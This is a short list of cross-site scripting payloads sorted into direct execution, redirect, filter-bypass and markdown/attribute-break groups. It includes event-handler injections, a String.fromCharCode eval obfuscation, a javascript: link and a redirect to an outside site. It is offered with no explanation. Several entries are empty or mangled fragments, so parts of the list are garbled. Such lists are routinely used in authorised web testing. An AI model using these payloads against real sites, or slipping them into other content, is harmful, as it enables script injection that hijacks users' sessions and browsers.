Direct Execution Payloads
"><svg/onload=alert('XSS_SVG')>
"><img src=x onerror=alert('XSS_Image')>
"><details open ontoggle=alert('XSS_Details')>
">
"><audio src=x onerror=alert('XSS_Audio')>
"><input autofocus onfocus=alert('XSS_Focus')>
">
(Unsupported src)
"><marquee onstart=alert('XSS_Marquee')>
"><body onload=alert('XSS_Body')>
Redirect & Protocol Bypasses
">![]()
"><svg/onload="location.replace('https://x.com')">
">Click Me
">
">
(Unsupported src)
Obfuscation & Filter Bypasses
">alert('XSS_Case_Sensitivity')
">![]()
"><svg/onload=eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))>
">![]()
">![]()
">Click
Markdown & Attribute Breaks
[XSS](javascript:alert('XSS_Markdown'))
![XSS]()
"onmouseover="alert('XSS_Hover')
"style="width:1000px;height:1000px"onmouseover="alert('XSS_Overlay')
<details/open/ontoggle="new(Function)('al'+'ert(1)')()">
![]()
